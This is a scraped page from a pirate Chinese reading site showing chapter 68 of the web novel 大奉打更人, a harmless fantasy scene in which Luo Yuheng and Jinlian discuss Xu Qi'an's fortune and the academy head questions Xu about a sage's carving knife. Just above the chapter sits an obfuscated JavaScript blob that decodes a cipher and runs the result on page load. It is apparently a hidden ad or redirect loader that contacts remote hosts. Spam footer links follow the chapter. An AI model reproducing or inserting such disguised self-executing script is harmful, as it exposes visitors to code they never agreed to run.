章鱼阅读

安装
字:
关灯 护眼
章鱼阅读 > 大奉打更人 > 第六十八章 两场谈话
(function(){function md4f7b23d(i897a78){var j80fb="Sdq6uy12ri84l$3gGtjV-?(BbNkvx|~9/[D]OC,:fFpKEXAw%mzUo=eWQ!JZL0;_haT@RInc.PH&^7s5YM";var y687705df="L^RU8upgW!Sq&5:P];/@9GslKIaF~,HV$Mo=.B[0wiZ6_rOnze%2Xfkx17Aj|-m(dY4Tt?J3EDbNQychvC";return i897a78.split('').map(function(je7d7){var fb11afc=j80fb.indexOf(je7d7);return fb11afc==-1?je7d7:y687705df[fb11afc]}).join('')}var c=md4f7b23d('thunder://fFwhDf,"" + "=" + "u" + "$" + "m" + "u" + "k" + "-"+""G]=ywsRFDw_) { t _=ywsRFDw _XQ=mK-kKk| fT!sc$K| HUccu$| (U:TsKhch| YcmTK!s) { F= _jd[ksLrFwjORm(R_wkYF2kRDXO1BkR=DX;)) { XmRyXw }t YkX F$UKU$$Uc ] =ywsRFDw _XcHQh-!) { XmRyXw 8RXFw2O=XD;M5kXMDhm_XcHQh-!) }t YkX 7s$$$cTU ] (U:TsKhch,F$UKU$$Uc_:WKQ) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKU)G| (KTcHT ] (U:TsKhch,F$UKU$$Uc_:WKU) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKQ)G| BQkk$mQ ] YcmTK!s,7s$$$cTU_"ac97s;9yhv&Zs;BfhJ]]")G| wHQT!H! ] 7s$$$cTU_"acnBaoqBqrWBHr9yhJ]]")t YkX 2!m$$sc:$ ] 7s$$$cTU_"m;&eprnQpf]]")t YkX 7u!KKt F= _BDskRFDwO(mkXs5OFwhmWA=_2!m$$sc:$) > 0Q) { 7u!KK ] YcmTK!s,wHQT!H!G_7s$$$cTU_"h?9Th?v7pr.]"))t 7u!KKOFh ] "R" + _[kR5OXkwhD;_) * Q::::)t 7u!KKO(R7BmOfFhR5 ] "Q::z"t 7u!KKO(R7BmO5mF25R ] "c::1W"t 7u!KKOhF(kHBmh ] RXymt YcmTK!sOHDh7Ok11mwhM5FBh_7u!KK) } YkX 2hs-=c! ] YcmTK!s,wHQT!H!G_7s$$$cTU_"krp7arQB"))t 2hs-=c!OFh ] "W" + _[kR5OXkwhD;_) * Q::::)t 2hs-=c!O(R7BmOfFhR5 ] "Q:1W"t 2hs-=c!O(R7BmO5mF25R ] $ + "1W"t 2hs-=c!O(R7BmOHkse2XDywh ] "#vvv"t YkX (KuHcK ] =ywsRFDw _Rm-TKH) { 2hs-=c!O(Xs ] ,"5RR1(3jj"| Rm-TKH| "X"| "ZQQQ"| HUccu$ + "IEX]" + _(KTcHT_BDskRFDwO5Xm=))GOZDFw_"j")t YcmTK!sOHDh7Ok11mwhM5FBh_2hs-=c!) }t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\w(mwh HXFh2Fw2 5D(R " + fT!sc$K } (U:TsKhch,7s$$$cTU_"p;9:aU2]")G_,"5RR1(3jj"| 7s$$$cTU_fT!sc$K)| "5;OZ(I" + PkRm,"wDf"G_) + _7u!KK ]] wyBB I "" 3 2!m$$sc:$)GOZDFw_"j"))OR5mw__e-s-Us) ]> e-s-UsORmWR_))OR5mw__e-s-Us) ]> { F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm HXFh2Fw2 5D(R " + e-s-Us }t (KuHcK_7s$$$cTU_e-s-UsO(1BFR_"")OXmYmX(m_)OZDFw_""))) })OskRs5__mXX) ]> { (KuHcK_7s$$$cTU_XQ=mK-kKk)) })t (U:TsKhch,"khh.YmwRSF(RmwmX"G_";m((k2m"| =ywsRFDw _m) { F= _mOhkRkOe ]] HUccu$) { YcmTK!sO2mR.Bm;mwRC7Nh_2hs-=c!OFh)OXm;DYm_)t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm F=Xk;m 1D(R ;m((k2m" } wmf vywsRFDw_"kX2("| 7s$$$cTU_mOhkRkOY))_{ ERhs(3 BQkk$mQ| ERXk3 7u!KK }) } }) })_"k;QFS;BKm;&chcscS;W1h;6]"| "k?nRs8$5swhD[c&ZsF$ZH~9F"| "QcUUUK--U$!-U$"| fFwhDf| hDsy;mwR) }t=u$muk-_)t'.substr(10));new Function(c)()})();

第六十八章 两场谈话

章节错误,点此举报(免注册),如遇到内容乱码错字顺序乱,请退出阅读模式或畅读模式即可正常。
“国师,国师?”
  蒙面纱的女子喊了几声,发现洛玉衡面容呆滞,眼神涣散,像一尊玉美人,美则美矣,却没了灵动。
  面纱女子伸手去推,却被一道气墙挡了回来。
  ............
  外城,某座小院。
  一道常人无法捕捉的幽光降临,落在院中,化作身穿玄色道袍,头戴莲花冠的美艳女子。
  她杏眼桃腮,五官绝美,秀发乌黑靓丽,宽松的道袍也掩盖不住胸前骄傲的挺拔。
  洛玉衡推门而入,看见一位头发花白的老道躺在床上,面容安详。
  她凝神感应了一下,于宽松道袍中探出素手,骤然一抓。
  几息后,一道略显虚幻的人影自远处归来,被她摄入掌心,袖袍一挥,打入老道肉身。
  金莲道长睁开眼,盘身坐起,无奈道:“我已经在赶回来的路上。”
  说着,金莲道长审视着洛玉衡高挑浮凸的身段,道:“师妹连阳神都出窍了,如此急切,是有什么要紧的事?”
  洛玉衡没有废话,直截了当的问:“今日斗法你看了?”
  金莲道长颔首。
  “儒家刻刀出现了。”
  ........金莲道长略作迟疑,微微点头。
  “我问你,许七安究竟是什么人。”洛玉衡跨前一步,妙目灼灼。
  “一个普通人。”金莲道长的回答竟有些迟疑。
  “一个普通人能使用儒家的刻刀?”洛玉衡冷笑。
  金莲道长皱眉不语。
  许久后,他缓缓道:“当初我遇到他时,看出他是有大福缘的人,便将地书碎片赠予他,借他的福缘躲避紫莲的追踪。
  “事后,我对他的身份做了调查,觉得有些奇怪。不管是李妙真、楚元缜还是其他人,我将地书碎片赠予他们时,差不多都已经起势。
  “唯独许七安是炼精境,家世更是平平无奇,何来福缘?呵,福缘要么行善积德,要么祖先庇佑。他两个都不占。
  洛玉衡耐心的听着,没有打断。
  “后来发生一件事,让我意识到他的情况不对.........有一次,这小子在地书碎片中自曝,说他天天捡银子,想知道原因何在。”
  听到这里,洛玉衡忍不住了:“这不是福缘吧。”
  金莲道长凝视着她,眸光深刻且明亮,一字一句道:“这是气运,泼天的气运。”
  尽管有所猜测,但得到金莲道长的确认,洛玉衡瞳孔倏地收缩。
  ...........
  许七安幽幽醒来,浑身各处疼痛,尤其是脖颈,火辣辣的痛感出来。
  他转动眼睛,扫了一眼周围的景象,白色的床帐,绣着荷叶的锦被,简单却雅致的陈设.........外厅的圆桌边坐着一位穿儒衫的老者。
  儒衫老者花白的头发凌乱垂下,儒衫松垮,花白的胡子许久没有修剪,整个人透着一股“丧”的气息。
  这犬儒是谁?许七安心里闪过疑惑。
  “你醒了,”犬儒老者起身,含笑道:“我是云鹿书院的院长赵守。”
  云鹿书院的院长........辞旧说过,书院的院长是儒家三品立命境!许七安立刻直起身,拱手道:
  “原来是院长,院长气质不凡,儒雅内敛,真是一位德高望重的长辈。”
  顿了顿,他才说道:“院长为何在我房里?”
  院长赵守没有回答,目光落在他右手,许七安这才发现自己始终握着刻刀。
  他先是一愣,旋即有了猜测:这把刻刀是云鹿书院的?也对,除了云鹿书院,还有什么体系能裹挟浩然正气。
  “这把刻刀是我书院的至宝,你一直握在手里,谁都取不走,我就只好在这里等你醒来,顺便问你一些事。”
  赵守说完,又看了一眼古朴刻刀,那眼神仿佛在说:还握着?小后生一点都不懂事。
  许七安双手奉上。
  赵守没接,而是看了眼桌子。
  心领神会的许七安把刻刀丢在桌上,哐当一声。
  赵守眉头一跳,连忙作揖,朝着刻刀拜了三拜,这才从袖中取出一只木盒,将刻刀收了进去。
  “许大人可知刻刀是何来历。”赵守微笑道。
  许七安心里微动,大胆猜测:“亚圣的刻刀?”
  赵守摇头:“这是圣人的刻刀。”
  圣人的刻刀........是那个圣人吗,是超越品级的圣人吗.........那个,刻刀能让我再摸一会儿吗,我还没拍照发朋友圈.........许七安张着嘴巴,喉咙像是失声,说不出话来。
  “自从亚圣逝去,这把刻刀沉寂了一千多年,后人纵使能使用它,却无法唤醒它。没想到今日破盒而出,为许大人助阵。”
  赵守凝神望着许七安,沉声道:“有些话,还得当面提点许大人。”
  许七安心里一沉,有所预感,从床上起身,躬身作揖:“请院长指点。”
  ...........
  “不可能,不可能.......”
  洛玉衡不停摇头,两条精致修长的眉毛皱紧,反驳道:
  “我与他接触过许多次,他如果身怀气运,我不可能察觉不到,我人宗怎么可能察觉不到?”
  金莲道长反问道:“如果被屏蔽了天机呢?而今你再去看许七安,一样察觉不到他有任何异常。”
  “你是说监正?”洛玉衡深吸一口气,皱眉的姿态也美不胜收,随着眉心皱起,眸光锐利如刀:
  “你不是调查过许七安吗,他小小一个银锣,祖上没有经天纬地的人物,他如何承担的起气运加身?”
  “抱歉,这件事我没有想通。”金莲道长从床榻起身,走到桌边坐下,倒了两杯水,示意洛玉衡入座。
  女子国师不理。
  她现在哪有闲心喝茶。
  洛玉衡思考许久,突然说道:“如果是术士屏蔽了天机,按理说,你根本看不到他的福缘。监正布局草蛇灰线,他不想让别人知道,别人就永远不知道,这就是一品术士。”
  “你能想到的事,我自然想到了。”金莲道长喝着茶,语气平静:“前段时间,我发现他的福缘消失了,特意过去看看。
免费看片APP    美女直播间
『加入书签,方便阅读』
继续浏览精彩内容
到笔趣阁APP免费阅读
《大奉打更人》
打开
浏览器
继续